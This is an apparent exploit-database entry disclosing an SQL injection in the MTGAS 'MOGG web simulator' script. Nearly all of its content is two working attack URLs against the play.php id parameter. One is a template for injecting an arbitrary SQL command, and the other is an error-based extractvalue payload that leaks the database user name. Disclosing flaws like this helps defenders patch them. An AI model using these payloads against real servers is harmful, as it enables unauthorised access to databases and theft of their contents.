id: 31475
date: 10/31/2018
title: MTGAS MOGG Web Simulator Script - SQL Injection Vulnerability
author: Meisam Monsef
cves: 

# Exploit Title: MOGG web simulator Script - SQL Injection
# Exploit Author: Meisam Monsef - meisamrce@gmail.com - @meisamrce -
@dorsateam
# Vendor Homepage: https://github.com/spider312/mtgas
# Version: All Version
 
 
Exploit :
http://server/play.php?id=99999'+[SQL Command]+#
http://server/play.php?id=99999%27+and+extractvalue(1,concat(0x3a,user(),0x3a))%23

#  0day.today [2023-03-25]  #